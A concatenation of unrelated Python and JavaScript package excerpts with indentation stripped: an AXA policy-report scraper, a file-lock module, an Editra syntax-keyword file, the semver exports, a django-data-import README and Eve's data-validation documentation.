self.logger.writeLogString('AXA','PROCESSING:'+str(policy))
policy_url_link = url_link.format(policy)
#self.browser.execute_script(policy_url_link)
self.browser.switch_to.new_window('tab')
self.browser.switch_to.window(self.browser.window_handles[1])
self.browser.get(policy_url_link)
try:
self.browser.find_element(By.LINK_TEXT,policy).click()
soup = BeautifulSoup(self.browser.page_source, 'lxml')
file1 = open(self.reportPath+policy+".txt","a",encoding="utf-8")#append mode
file1.write(soup.prettify())
file1.close()
self.downloadPolicyReport(str(policy))
except Exception as ex:
self.frame.setStatusLableText(self.stringValue.processException.get().format(str(policy),str(ex)))
self.logger.writeLogString('AXA',str(policy)+" throws Exception:" + str(ex))
self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
finally:
self.frame.setStatusLableText(self.stringValue.processCompleted.get().format(str(policy)))
self.logger.writeLogString('AXA',str(policy)+" COMPLETED")
self.frame.setStatusProgresValueByValue(1)
self.browser.close()
self.browser.switch_to.window(self.browser.window_handles[0])
self.buildReportQueue.append(policy)
self.buildHeaderQueue.append(policy)
self.frame.setListItemColor(str(policy),self.STATUS_SCRAP_COMPLETE)
def buildReport(self):
self.buildReportThread = threading.Thread(target = self.__buildReport)
self.buildReportThread.start()
self.buildReportHeaderFullFlow()
pass
def buildReportOnly(self):
self.buildReportThread = threading.Thread(target = self.__buildReportOnly)
self.buildReportThread.start()
self.buildReportHeaderHalfFlow()
pass
def buildReportHeaderFullFlow(self):
self.buildHeaderThread = threading.Thread(target = self.__buildReportHeaderFullFlow)
self.buildHeaderThread.start()
pass
def buildReportHeaderHalfFlow(self):
self.buildHeaderThread = threading.Thread(target = self.__buildReportHeaderHalfFlow)
self.buildHeaderThread.start()
pass
def downloadPolicyReport(self, policy):
if not self.downloadReport:
return
try:
self.browser.find_element(By.XPATH,"/html/body/div/div[2]/table/tbody/tr/td[2]/div[1]/div[1]/div[2]/a").click()
self.browser.switch_to.window(self.browser.window_handles[2])
self.browser.find_element(By.XPATH,"/html/body/div/div[1]/div[1]/ul/li[2]/a").click()
#Selenium no build-in check download complete listerner, check by file exist in path
reportFullPath = self.reportPath+"{0} _ AXA iPro Office.pdf".format(policy)
while exists(reportFullPath) == False:
time.sleep(1)
self.browser.find_element(By.XPATH,"/html/body/div/div[1]/div[1]/ul/li[1]/a").click()
self.browser.switch_to.window(self.browser.window_handles[1])
except Exception as ex:
pass
def __buildReportHeaderFullFlow(self):
self.logger.writeLogString('AXA-HEADER','START BUILD HEADER FULLFLOW')
policy_iteration = 0
while policy_iteration < self.maxPolicyListSize:
for policy in self.buildHeaderQueue:
self.logger.writeLogString('AXA-HEADER','POLICY NO.:{0}'.format(str(policy)))
if self.isStopped:
return
try:
file = open(self.reportPath+policy+".txt",encoding="utf-8")#append mode
#Full Html src
soup_all_src = BeautifulSoup(file.read(), 'lxml')
file.close()
soup_pdBody = self.SearchByHtmlTagClassValue(soup_all_src,'div','pbBody')
soup_pbSubsection = self.SearchByHtmlTagClassValue(soup_pdBody,'div','pbSubsection')
soup_pb_header = self.SearchByHtmlTagClassValue(soup_pbSubsection,'td','labelCol')
for col_num, strong_tag in enumerate(soup_pb_header.find_all('td')):
self.worksheet.write(0, col_num+1, strong_tag.text.strip().replace('\t','').replace('\n','').replace(u'\xa0', u' '))
#No error when building the header,break all loop and then stop this thread
policy_iteration = self.maxPolicyListSize + 1
self.logger.writeLogString('AXA-HEADER','BUILD HEADER COMPLETED, BREAK LOOP')
break
except FileNotFoundError as ex:
self.logger.writeLogString('AXA-HEADER','FILE NOT FOUND')
except Exception as ex:
self.logger.writeLogString('AXA-HEADER','EXCEPTION:'+str(ex))
finally:
policy_iteration = policy_iteration + 1
if policy in self.buildHeaderQueue:
self.buildHeaderQueue.remove(policy)
else:
time.sleep(1)
def __buildReportHeaderHalfFlow(self):
self.logger.writeLogString('AXA-HEADER','START BUILD HEADER HALFFLOW')
for policy in self.policyList:
self.logger.writeLogString('AXA-HEADER','POLICY NO.:{0}'.format(str(policy)))
if self.isStopped:
return
try:
file = open(self.inputPath+policy+".txt",encoding="utf-8")#append mode
#Full Html src
soup_all_src = BeautifulSoup(file.read(), 'lxml')
file.close()
soup_pdBody = self.SearchByHtmlTagClassValue(soup_all_src,'div','pbBody')
soup_pbSubsection = self.SearchByHtmlTagClassValue(soup_pdBody,'div','pbSubsection')
soup_pb_header = self.SearchByHtmlTagClassValue(soup_pbSubsection,'td','labelCol')
for col_num, strong_tag in enumerate(soup_pb_header.find_all('td')):
self.worksheet.write(0, col_num+1, strong_tag.text.strip().replace('\t','').replace('\n','').replace(u'\xa0', u' '))
#No error when building the header,break all loop and then stop this thread
self.logger.writeLogString('AXA-HEADER','BUILD HEADER COMPLETED, BREAK LOOP')
break
except FileNotFoundError as ex:
self.logger.writeLogString('AXA-HEADER','FILE NOT FOUND')
except Exception as ex:
self.logger.writeLogString('AXA-HEADER','EXCEPTION:'+str(ex))
def __buildReport(self):
self.logger.writeLogString('AXA-CONTENT','START BUILD REPORT')
policy_iteration = 0
while policy_iteration < self.maxPolicyListSize:
for policy in self.buildReportQueue:
if self.isStopped:
return
self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),""))
self.logger.writeLogString('AXA-CONTENT','POLICY NO.:{0}'.format(str(policy)))
try:
self.worksheet.write(policy_iteration+1,0,str(policy))
file = open(self.reportPath+policy+".txt",encoding="utf-8")#append mode
#Full Html src
soup_all_src = BeautifulSoup(file.read(), 'lxml')
file.close()
soup_pdBody = self.SearchByHtmlTagClassValue(soup_all_src,'div','pbBody')
soup_pbSubsection = self.SearchByHtmlTagClassValue(soup_pdBody,'div','pbSubsection')
soup_pb_value = self.SearchByHtmlTagClassValue(soup_pbSubsection,'td','dataCol')
for col_num,strong_tag in enumerate(soup_pb_value.find_all('td')):
self.worksheet.write(policy_iteration+1, col_num+1, strong_tag.text.strip().replace('\t','').replace('\n','').replace(u'\xa0', u' '))
except FileNotFoundError:
self.worksheet.write(policy_iteration+1,1,str(policy)+" not found in this A/C, please check other A/C")
self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),"not found"))
self.logger.writeLogString('AXA-CONTENT','FILE NOT FOUND')
self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
except Exception as ex:
self.worksheet.write(policy_iteration+1,1,"System Error ! Please contact IT Support!")
self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),"failed"))
self.logger.writeLogString('AXA-CONTENT','EXCEPTION:'+str(ex))
self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
finally:
self.frame.setStatusProgresValueByValue(1)
policy_iteration = policy_iteration + 1
if policy in self.buildReportQueue:
self.buildReportQueue.remove(policy)
self.frame.setListItemColor(str(policy),self.STATUS_REPORT_COMPLETE)
else:
time.sleep(1)
self.buildHeaderThread.join()
self.workbook.close()
self.frame.setStatusLableText(self.stringValue.completed.get())
self.logger.writeLogString('AXA-CONTENT','COMPLETED BUILD REPORT')
def __buildReportOnly(self):
self.logger.writeLogString('AXA-CONTENT','START BUILD REPORT OFFLINE MODE')
for policy_iteration,policy in enumerate(self.policyList):
if self.isStopped:
return
self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),""))
self.logger.writeLogString('AXA-CONTENT','POLICY NO.:{0}'.format(str(policy)))
try:
self.worksheet.write(policy_iteration+1,0,str(policy))
file = open(self.inputPath+policy+".txt",encoding="utf-8")#append mode
#Full Html src
soup_all_src = BeautifulSoup(file.read(), 'lxml')
file.close()
soup_pdBody = self.SearchByHtmlTagClassValue(soup_all_src,'div','pbBody')
soup_pbSubsection = self.SearchByHtmlTagClassValue(soup_pdBody,'div','pbSubsection')
soup_pb_value = self.SearchByHtmlTagClassValue(soup_pbSubsection,'td','dataCol')
for col_num,strong_tag in enumerate(soup_pb_value.find_all('td')):
self.worksheet.write(policy_iteration+1, col_num+1, strong_tag.text.strip().replace('\t','').replace('\n','').replace(u'\xa0', u' '))
except FileNotFoundError:
self.worksheet.write(policy_iteration+1,1,str(policy)+" not found in this A/C, please check other A/C")
self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),"not found"))
self.logger.writeLogString('AXA-CONTENT','FILE NOT FOUND')
self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
except Exception as ex:
self.worksheet.write(policy_iteration+1,1,"System Error ! Please contact IT Support!")
self.frame.setStatusLableText(self.stringValue.buildReport.get().format(str(policy),"failed"))
self.logger.writeLogString('AXA-CONTENT','EXCEPTION:'+str(ex))
self.frame.setListItemColor(str(policy),self.STATUS_EXCEPTION)
finally:
self.frame.setStatusProgresValueByValue(2)
self.frame.setListItemColor(str(policy),self.STATUS_REPORT_COMPLETE)
self.buildHeaderThread.join()
self.workbook.close()
self.frame.setStatusLableText(self.stringValue.completed.get())
self.logger.writeLogString('AXA-CONTENT','COMPLETED BUILD REPORT OFFLINE MODE') | PypiClean |
/GraphLab_Create-2.1-cp27-none-macosx_10_5_x86_64.macosx_10_6_intel.macosx_10_9_intel.macosx_10_9_x86_64.macosx_10_10_intel.macosx_10_10_x86_64.macosx_10_11_intel.macosx_10_11_x86_64.whl/graphlab/util/lockfile/__init__.py | from __future__ import absolute_import
import sys
import socket
import os
import threading
import time
import urllib
import warnings
import functools
# Work with PEP8 and non-PEP8 versions of threading module.
if not hasattr(threading, "current_thread"):
threading.current_thread = threading.currentThread
if not hasattr(threading.Thread, "get_name"):
threading.Thread.get_name = threading.Thread.getName
__all__ = ['Error', 'LockError', 'LockTimeout', 'AlreadyLocked',
'LockFailed', 'UnlockError', 'NotLocked', 'NotMyLock',
'LinkLockFile', 'MkdirLockFile', 'SQLiteLockFile',
'LockBase', 'locked']
class Error(Exception):
"""
Base class for other exceptions.
>>> try:
... raise Error
... except Exception:
... pass
"""
pass
class LockError(Error):
"""
Base class for error arising from attempts to acquire the lock.
>>> try:
... raise LockError
... except Error:
... pass
"""
pass
class LockTimeout(LockError):
"""Raised when lock creation fails within a user-defined period of time.
>>> try:
... raise LockTimeout
... except LockError:
... pass
"""
pass
class AlreadyLocked(LockError):
"""Some other thread/process is locking the file.
>>> try:
... raise AlreadyLocked
... except LockError:
... pass
"""
pass
class LockFailed(LockError):
"""Lock file creation failed for some other reason.
>>> try:
... raise LockFailed
... except LockError:
... pass
"""
pass
class UnlockError(Error):
"""
Base class for errors arising from attempts to release the lock.
>>> try:
... raise UnlockError
... except Error:
... pass
"""
pass
class NotLocked(UnlockError):
"""Raised when an attempt is made to unlock an unlocked file.
>>> try:
... raise NotLocked
... except UnlockError:
... pass
"""
pass
class NotMyLock(UnlockError):
"""Raised when an attempt is made to unlock a file someone else locked.
>>> try:
... raise NotMyLock
... except UnlockError:
... pass
"""
pass
class LockBase:
"""Base class for platform-specific lock classes."""
def __init__(self, path, threaded=True, timeout=None):
"""
>>> lock = LockBase('somefile')
>>> lock = LockBase('somefile', threaded=False)
"""
self.path = path
self.lock_file = os.path.abspath(path) + ".lock"
self.hostname = socket.gethostname()
self.pid = os.getpid()
if threaded:
t = threading.current_thread()
# Thread objects in Python 2.4 and earlier do not have ident
# attrs. Worm around that.
ident = getattr(t, "ident", hash(t))
self.tname = "-%x" % (ident & 0xffffffff)
else:
self.tname = ""
dirname = os.path.dirname(self.lock_file)
# unique name is mostly about the current process, but must
# also contain the path -- otherwise, two adjacent locked
# files conflict (one file gets locked, creating lock-file and
# unique file, the other one gets locked, creating lock-file
# and overwriting the already existing lock-file, then one
# gets unlocked, deleting both lock-file and unique file,
# finally the last lock errors out upon releasing.
self.unique_name = os.path.join(dirname,
"%s%s.%s%s" % (self.hostname,
self.tname,
self.pid,
hash(self.path)))
self.timeout = timeout
def acquire(self, timeout=None):
"""
Acquire the lock.
* If timeout is omitted (or None), wait forever trying to lock the
file.
* If timeout > 0, try to acquire the lock for that many seconds. If
the lock period expires and the file is still locked, raise
LockTimeout.
* If timeout <= 0, raise AlreadyLocked immediately if the file is
already locked.
"""
raise NotImplemented("implement in subclass")
def release(self):
"""
Release the lock.
If the file is not locked, raise NotLocked.
"""
raise NotImplemented("implement in subclass")
def is_locked(self):
"""
Tell whether or not the file is locked.
"""
raise NotImplemented("implement in subclass")
def i_am_locking(self):
"""
Return True if this object is locking the file.
"""
raise NotImplemented("implement in subclass")
def break_lock(self):
"""
Remove a lock. Useful if a locking thread failed to unlock.
"""
raise NotImplemented("implement in subclass")
def __enter__(self):
"""
Context manager support.
"""
self.acquire()
return self
def __exit__(self, *_exc):
"""
Context manager support.
"""
self.release()
def __repr__(self):
return "<%s: %r -- %r>" % (self.__class__.__name__, self.unique_name,
self.path)
def _fl_helper(cls, mod, *args, **kwds):
warnings.warn("Import from %s module instead of lockfile package" % mod,
DeprecationWarning, stacklevel=2)
# This is a bit funky, but it's only for awhile. The way the unit tests
# are constructed this function winds up as an unbound method, so it
# actually takes three args, not two. We want to toss out self.
if not isinstance(args[0], str):
# We are testing, avoid the first arg
args = args[1:]
if len(args) == 1 and not kwds:
kwds["threaded"] = True
return cls(*args, **kwds)
def LinkFileLock(*args, **kwds):
"""Factory function provided for backwards compatibility.
Do not use in new code. Instead, import LinkLockFile from the
lockfile.linklockfile module.
"""
from . import linklockfile
return _fl_helper(linklockfile.LinkLockFile, "lockfile.linklockfile",
*args, **kwds)
def MkdirFileLock(*args, **kwds):
"""Factory function provided for backwards compatibility.
Do not use in new code. Instead, import MkdirLockFile from the
lockfile.mkdirlockfile module.
"""
from . import mkdirlockfile
return _fl_helper(mkdirlockfile.MkdirLockFile, "lockfile.mkdirlockfile",
*args, **kwds)
def SQLiteFileLock(*args, **kwds):
"""Factory function provided for backwards compatibility.
Do not use in new code. Instead, import SQLiteLockFile from the
lockfile.mkdirlockfile module.
"""
from . import sqlitelockfile
return _fl_helper(sqlitelockfile.SQLiteLockFile, "lockfile.sqlitelockfile",
*args, **kwds)
def locked(path, timeout=None):
"""Decorator which enables locks for decorated function.
Arguments:
- path: path for lockfile.
- timeout (optional): Timeout for acquiring lock.
Usage:
@locked('/var/run/myname', timeout=0)
def myname(...):
...
"""
def decor(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
lock = FileLock(path, timeout=timeout)
lock.acquire()
try:
return func(*args, **kwargs)
finally:
lock.release()
return wrapper
return decor
if hasattr(os, "link"):
from . import linklockfile as _llf
LockFile = _llf.LinkLockFile
else:
from . import mkdirlockfile as _mlf
LockFile = _mlf.MkdirLockFile
FileLock = LockFile | PypiClean |
/Editra-0.7.20.tar.gz/Editra-0.7.20/src/syntax/_gui4cli.py | __author__ = "Cody Precord <cprecord@editra.org>"
__svnid__ = "$Id: _gui4cli.py 68798 2011-08-20 17:17:05Z CJP $"
__revision__ = "$Revision: 68798 $"
#-----------------------------------------------------------------------------#
# Imports
import wx.stc as stc
# Local Imports
import synglob
import syndata
#-----------------------------------------------------------------------------#
#---- Keyword Definitions ----#
GLOBALS = (0, "3STATE #ANSI #FIXANSI #FIXOEM #FIXSYS #GUI #SEPARATOR #SYS ABRI "
"ACTIVE ALL ALTSTART APPDATA APPWIN ARRANGE ARROW ASCEND AUTO "
"BACK BC BITBUCKET BL BOLD BORDER BOTTOM BR BUFFERS BUSY BUTTON "
"BUTTONS CAPTION CENTER CHAR CHECK CHILD CLEAN CLEAR CLOSED "
"COLOR COMM COMMON.ALTSTART COMMON.DESKTOP COMMON.FAVORITES "
"COMMON.MENU COMMON.PROGRAMS COMMON.STARTUP COOKIES CROSS CURDIR "
"CURRENT CURSOR DATA DATE DAY DECORATIVE DEF1 DEF2 DEF3 DEF4 "
"DESCEND DESKTOP DIALOG DIR DISABLE DISABLED DISK DISKS DLBEGIN "
"DLCOMPLETE DLGFRAME DOUBLE DRAG DROP DROPLIST DTTM EDIT EDITOR "
"EFFECTS ELLIPSE EMBOSS END ENABLE ENDGUI ENGLISH ENTER ERROR "
"EXISTS EXPLORE EXT FAIL FAVORITES FIELDS FILE FILES FIND FIRST "
"FIXED FIXWIDTH FLAT FNUMBER FOCUS FOREGROUND FORMAT FORWARD "
"FREE FRONT FULL FULLPATH GCDIR GCEXE GCNAME GREEK GRID GUIPATH "
"HEAVY HEIGHT HELP HEX HIDDEN HIDE HIST HISTORY HOME HORIZONTAL "
"HOT HOUR IBEAM ICLEFT INDEX INFO INT INVOKE ITALIC ITEM JULIAN "
"JUSTIFY LARGE LAST LB LBLEFT LC LENGTH LIGHT LINE LINES LMB "
"LMDC LOAD LOADED LOWER LT MAX MAXI MAXBOX MAXIMIZE MEDIUM MENU "
"MINBOX MINI MINIMIZE MINUTE MMB MODERN MONTH MOVE MSEC MULTI "
"NAME NAVCOMPLETE NETCACHE NETHOOD NEW NEWMENU NEXT NO NOADJUST "
"NOBORDER NOERROR NOEXT NOFACE NOFILES NOFOCUS NOFOLDERS NONE "
"NOOPEN NOREFRESH NORESET NORMAL NORTH NOSIZE NOVECTOR NOVRT NOW "
"NOWRAP NUMBER OCTAL OFF OK OKCANCEL ON ONECLICK ONELINE OPEN "
"OVERLAP OWNED PARENT PATH PCPATH PERIOD PERSONAL POLYGON PREFS "
"PREV PREVIOUS PRINT PRINTERS PROGRAMS PROP PROPERTY PULSE "
"QUESTION QUOTE RAGGED RAISED RB RC REC RECENT REFRESH REMOVE "
"REMSIZE RENAME REPORT RESIZE RET RETRY RIGHT RMB ROMAN ROOT "
"ROUNDED ROUTINE ROWS RT SAVE SCALABLE SCREEN SCRIPT SCROLL "
"SEARCH SECOND SELECT SELECTED SELSCRIPT SENDTO SENSITIVE "
"SENTENCE SHELL SHOW SILENT SIMPLE SINGLE SIZE SMALL SMOOTH "
"SOLID SORT START STARTGUI STARTUP STAT0 STATIC STATUS STD STOP "
"STRECH STRIKE SUBCHILD SUBSUB SUNK SUNKEN SWISS SYSMENU TAB "
"TABS TC TEMPLATES TEXT THIN TIME TITLE TL TOGGLE TOOL TOP "
"TOPMOST TOTAL TR TRANS TRANSPARENT TTONLY TYPE UNDERLINE "
"UNFORMAT UNJULIAN UNQUOTE UNSELECT UNSELECTED UPPER USER VALID "
"VARIABLE VCENTER VERSION VERTICAL VIEW WAIT WARN WHEEL WIDTH "
"WINEDGE WORD YEAR YES YESNO YESTOALL YNCANCEL")
EVENTS = (1, "XAREA XBROWSER XBUTTON XCHECKBOX XCOMBO XEDBOX XGROUPBOX XICON "
"XIMAGE XLISTVIEW XMENU XPAN XPROGRESS XRADIO XREBAR XSPLITER "
"XSTATUS XTAB XTEXTBOX XTEXTIN XTOOLBAR XTRACKBAR XTREEVIEW "
"XUPDOWN XAFTER XATTR XBEFORE XENUM XHOTKEY XNOTIFY XONACTIVE "
"XONBROWSER XONCLICK XONCLOSE XONDOUBLECLICK XONDROP XONFAIL "
"XONHELP XONINACTIVE XONKEY XONLMB XONLOAD XONLVCLICK XONLVDIR "
"XONMARK XONMMB XONOPEN XONQUIT XONRELOAD XONRETURN XONRMB "
"XONTEXTIN XONWHEELDOWN XONWHEELUP XPIPE XREQFILE XROUTINE "
"XTBARICON XTIMER XONKEY")
ATTRIBUTES = (2, "ATTR BACKGROUND BUDDY BUFFERS COLORS COLSAVE DATA DBGSTEP DBGVARS "
"DEBUG DEEPTRANS EDITOR ENDGUI ESCAPE FAIL FILTER FONT FRAME "
"GRID HELP ICON ID IXICON KEY LIKE LOCAL LVCOLUMN MAXDATE "
"MAXSIZE MAXTRANS MCINOTIFY MCISIGNAL MENU MINDATE MINSIZE "
"NEXT OUTPUT PAGE PARENT PATH PREFS RBSTYLE RESIZE SAY SHAPE "
"SHOW STARTGUI STYLE TAB TITLE TRANSLATE VARIABLES")
CONTROL = (3, "AND ANDIFEXISTS BREAK CALL CASE DOCASE ELSE ELSEIF ELSEIFEXISTS "
"ENDCASE ENDFOR ENDIF ENDWHILE FOR GO GOSUB GOTO IF IFEXISTS "
"LABEL OR ORIFEXISTS QUIT RETURN STOP WHILE")
COMMANDS = (4, "ADD ADDRESS ADDUNIQUE APPEND APPVAR ASSIGN AUTO BRANCH BROWSER "
"CD CLOSE COMBO COMMAND COPY CREATE CREATELINK CUT CUTVAR DBSUM "
"DCKDEBUG DDEXEC DDPUT DDUSE DEC DEL DELAY DELETE DELVAR EDBOX "
"EMPTYBIN ENUM EXIT EXTRACT FLASH FREEFONT FREEICON GETCLIP "
"GETCOLOR GETFONT GOSUB GUI GUICLOSE GUILOAD GUIOPEN GUIQUIT "
"GUIRENAME GUIWINDOW HTMLHELP IMAGE INC JOINFILE LAUNCH "
"LISTVIEW LOADFONT LOADICON LV LVACTION LVCLIP LVREP LVSEARCH "
"LVSWITCH MAKEDIR MCI MOVE MSGBOX NEWFILE PARSEVAR POPMENU "
"QUICKMENU QUIT RANDOM REGCREATE REGDELETE REGGET REGSET RENAME "
"REPVAR REQFILE RUN SAY SEARCHVAR SEND SET SETATTR SETCLIP "
"SETEVENT SETGADVALUES SETICON SETPOINTER SETVAR SETWINATTR "
"SETWINTITLE SHELL STATUS SYSTEM TERMINATEPROC TEXTFILE "
"TREEVIEW TV UPDATE UPDOWN USE WAIT WINATTR WINDOW")
#---- End Keyword Definitions ----#
#---- Syntax Style Specs ----#
SYNTAX_ITEMS = [(stc.STC_GC_ATTRIBUTE, 'keyword3_style'),
(stc.STC_GC_COMMAND, 'keyword2_style'),
(stc.STC_GC_COMMENTBLOCK, 'comment_style'),
(stc.STC_GC_COMMENTLINE, 'comment_style'),
(stc.STC_GC_CONTROL, 'keyword_style'),
(stc.STC_GC_DEFAULT, 'default_style'),
(stc.STC_GC_EVENT, 'keyword4_style'),
(stc.STC_GC_GLOBAL, 'global_style'),
(stc.STC_GC_OPERATOR, 'operator_style'),
(stc.STC_GC_STRING, 'string_style')]
#---- Extra Properties ----#
FOLD = ("fold", "1")
FOLD_COMP = ("fold.compact", "1")
#-----------------------------------------------------------------------------#
class SyntaxData(syndata.SyntaxDataBase):
"""SyntaxData object for Gui4Cli"""
def __init__(self, langid):
super(SyntaxData, self).__init__(langid)
# Setup
self.SetLexer(stc.STC_LEX_GUI4CLI)
def GetKeywords(self):
"""Returns Specified Keywords List """
return [GLOBALS, EVENTS, ATTRIBUTES, CONTROL, COMMANDS]
def GetSyntaxSpec(self):
"""Syntax Specifications """
return SYNTAX_ITEMS
def GetProperties(self):
"""Returns a list of Extra Properties to set
@note: gui4cli supports folding but it seems to be partially broken
"""
return list() #[FOLD, FOLD_COMP]
def GetCommentPattern(self):
"""Returns a list of characters used to comment a block of code """
return [u'//'] | PypiClean |
/AyiinXd-0.0.8-cp311-cp311-macosx_10_9_universal2.whl/fipper/node_modules/semver/index.js | const internalRe = require('./internal/re')
const constants = require('./internal/constants')
const SemVer = require('./classes/semver')
const identifiers = require('./internal/identifiers')
const parse = require('./functions/parse')
const valid = require('./functions/valid')
const clean = require('./functions/clean')
const inc = require('./functions/inc')
const diff = require('./functions/diff')
const major = require('./functions/major')
const minor = require('./functions/minor')
const patch = require('./functions/patch')
const prerelease = require('./functions/prerelease')
const compare = require('./functions/compare')
const rcompare = require('./functions/rcompare')
const compareLoose = require('./functions/compare-loose')
const compareBuild = require('./functions/compare-build')
const sort = require('./functions/sort')
const rsort = require('./functions/rsort')
const gt = require('./functions/gt')
const lt = require('./functions/lt')
const eq = require('./functions/eq')
const neq = require('./functions/neq')
const gte = require('./functions/gte')
const lte = require('./functions/lte')
const cmp = require('./functions/cmp')
const coerce = require('./functions/coerce')
const Comparator = require('./classes/comparator')
const Range = require('./classes/range')
const satisfies = require('./functions/satisfies')
const toComparators = require('./ranges/to-comparators')
const maxSatisfying = require('./ranges/max-satisfying')
const minSatisfying = require('./ranges/min-satisfying')
const minVersion = require('./ranges/min-version')
const validRange = require('./ranges/valid')
const outside = require('./ranges/outside')
const gtr = require('./ranges/gtr')
const ltr = require('./ranges/ltr')
const intersects = require('./ranges/intersects')
const simplifyRange = require('./ranges/simplify')
const subset = require('./ranges/subset')
module.exports = {
parse,
valid,
clean,
inc,
diff,
major,
minor,
patch,
prerelease,
compare,
rcompare,
compareLoose,
compareBuild,
sort,
rsort,
gt,
lt,
eq,
neq,
gte,
lte,
cmp,
coerce,
Comparator,
Range,
satisfies,
toComparators,
maxSatisfying,
minSatisfying,
minVersion,
validRange,
outside,
gtr,
ltr,
intersects,
simplifyRange,
subset,
SemVer,
re: internalRe.re,
src: internalRe.src,
tokens: internalRe.t,
SEMVER_SPEC_VERSION: constants.SEMVER_SPEC_VERSION,
RELEASE_TYPES: constants.RELEASE_TYPES,
compareIdentifiers: identifiers.compareIdentifiers,
rcompareIdentifiers: identifiers.rcompareIdentifiers,
} | PypiClean |
/Django-Data-Import-1.0.2.tar.gz/Django-Data-Import-1.0.2/README.md | Django app for import CSV data
===
Adds a button "Import" on model list page in Django admin site that allow to import new records to any model.
I get some code from [django-import-export](https://github.com/django-import-export/django-import-export) and adopted it to work with CVS file import.
How to use
---
Follow next steps:
* Install with `pip install django-data-import`
* Add `django_data_import` to `INSTALLED_APPS` in your `settings.py` file
* Edit your `admin.py` file and add `from django_data_import import ImportDataMixin` and add mixin to ModelAdmin like this `class BlogAdmin(ImportDataMixin, admin.ModelAdmin)`
| PypiClean |
/Eve-2.1.0.tar.gz/Eve-2.1.0/docs/validation.rst | .. _validation:
Data Validation
===============
Data validation is provided out-of-the-box. Your configuration includes
a schema definition for every resource managed by the API. Data sent to the API
to be inserted/updated will be validated against the schema, and a resource
will only be updated if validation passes.
.. code-block:: console
$ curl -d '[{"firstname": "bill", "lastname": "clinton"}, {"firstname": "mitt", "lastname": "romney"}]' -H 'Content-Type: application/json' http://myapi/people
HTTP/1.1 201 OK
The response will contain a success/error state for each item provided in the
request:
.. code-block:: javascript
{
"_status": "ERR",
"_error": "Some documents contains errors",
"_items": [
{
"_status": "ERR",
"_issues": {"lastname": "value 'clinton' not unique"}
},
{
"_status": "OK",
}
]
]
In the example above, the first document did not validate so the whole request
has been rejected.
When all documents pass validation and are inserted correctly the response
status is ``201 Created``. If any document fails validation the response status
is ``422 Unprocessable Entity``, or any other error code defined by
``VALIDATION_ERROR_STATUS`` configuration.
For information on how to define documents schema and standard validation
rules, see :ref:`schema`.
Extending Data Validation
-------------------------
Data validation is based on the Cerberus_ validation system and it is therefore
extensible. As a matter of fact, Eve's MongoDB data-layer itself extends
Cerberus validation, implementing the ``unique`` and ``data_relation``
constraints, the ``ObjectId`` data type and the ``decimal128`` on top of
the standard rules.
.. _custom_validation_rules:
Custom Validation Rules
------------------------
Suppose that in your specific and very peculiar use case, a certain value can
only be expressed as an odd integer. You decide to add support for a new
``isodd`` rule to our validation schema. This is how you would implement
that:
.. code-block:: python
from eve.io.mongo import Validator
class MyValidator(Validator):
def _validate_isodd(self, isodd, field, value):
if isodd and not bool(value & 1):
self._error(field, "Value must be an odd number")
app = Eve(validator=MyValidator)
if __name__ == '__main__':
app.run()
By subclassing the base Mongo validator class and then adding a custom
``_validate_<rulename>`` method, you extended the available :ref:`schema`
grammar and now the new custom rule ``isodd`` is available in your schema. You
can now do something like:
.. code-block:: python
'schema': {
'oddity': {
'isodd': True,
'type': 'integer'
}
}
Cerberus and Eve also offer `function-based validation`_ and `type coercion`_,
lightweight alternatives to class-based custom validation.
Custom Data Types
-----------------
You can also add new data types by simply adding ``_validate_type_<typename>``
methods to your subclass. Consider the following snippet from the Eve source
code.
.. code-block:: python
def _validate_type_objectid(self, value):
""" Enables validation for `objectid` schema attribute.
:param value: field value.
"""
if isinstance(value, ObjectId):
return True
This method enables support for MongoDB ``ObjectId`` type in your schema,
allowing something like this:
.. code-block:: python
'schema': {
'owner': {
'type': 'objectid',
'required': True,
},
}
You can also check the `source code`_ for Eve custom validation, where you will
find more advanced use cases, such as the implementation of the ``unique`` and
``data_relation`` constraints.
For more information on
.. note::
We have only scratched the surface of data validation. Please make sure
to check the Cerberus_ documentation for a complete list of available
validation rules and data types.
Also note that Cerberus requirement is pinned to version 0.9.2, which still
supports the ``validate_update`` method used for ``PATCH`` requests.
Upgrade to Cerberus 1.0+ is scheduled for Eve version 0.8.
.. _unknown:
Allowing the Unknown
--------------------
Normally you don't want clients to inject unknown fields in your documents.
However, there might be circumstances where this is desirable. During the
development cycle, for example, or when you are dealing with very heterogeneous
data. After all, not forcing normalized information is one of the selling
points of MongoDB and many other NoSQL data stores.
In Eve, you achieve this by setting the ``ALLOW_UNKNOWN`` option to ``True``.
Once this option is enabled, fields matching the schema will be validated
normally, while unknown fields will be quietly stored without a glitch. You
can also enable this feature only for certain endpoints by setting the
``allow_unknown`` local option.
Consider the following domain:
.. code-block:: python
DOMAIN: {
'people': {
'allow_unknown': True,
'schema': {
'firstname': {'type': 'string'},
}
}
}
Normally you can only add (POST) or edit (PATCH) `firstnames` to the
``/people`` endpoint. However, since ``allow_unknown`` has been enabled, even
a payload like this will be accepted:
.. code-block:: console
$ curl -d '[{"firstname": "bill", "lastname": "clinton"}, {"firstname": "bill", "age":70}]' -H 'Content-Type: application/json' http://myapi/people
HTTP/1.1 201 OK
.. admonition:: Please note
Use this feature with extreme caution. Also be aware that, when this
option is enabled, clients will be capable of actually `adding` fields via
PATCH (edit).
``ALLOW_UNKNOWN`` is also useful for read-only APIs or endpoints that
need to return the whole document, as found in the underlying database. In this
scenario you don't want to bother with validation schemas. For the whole API
just set ``ALLOW_UNKNOWN`` to ``True``, then ``schema: {}`` at every endpoint.
For a single endpoint, use ``allow_unknown: True`` instead.
.. _schema_validation:
Schema validation
-----------------
By default, schemas are validated to ensure they conform to the structure
documented in :ref:`schema`.
In order to deal with non-conforming schemas, add
:ref:`custom_validation_rules` for non-conforming keys used in the schema.
.. _Cerberus: http://python-cerberus.org
.. _`source code`: https://github.com/pyeve/eve/blob/master/eve/io/mongo/validation.py
.. _`function-based validation`: http://docs.python-cerberus.org/en/latest/customize.html#function-validator
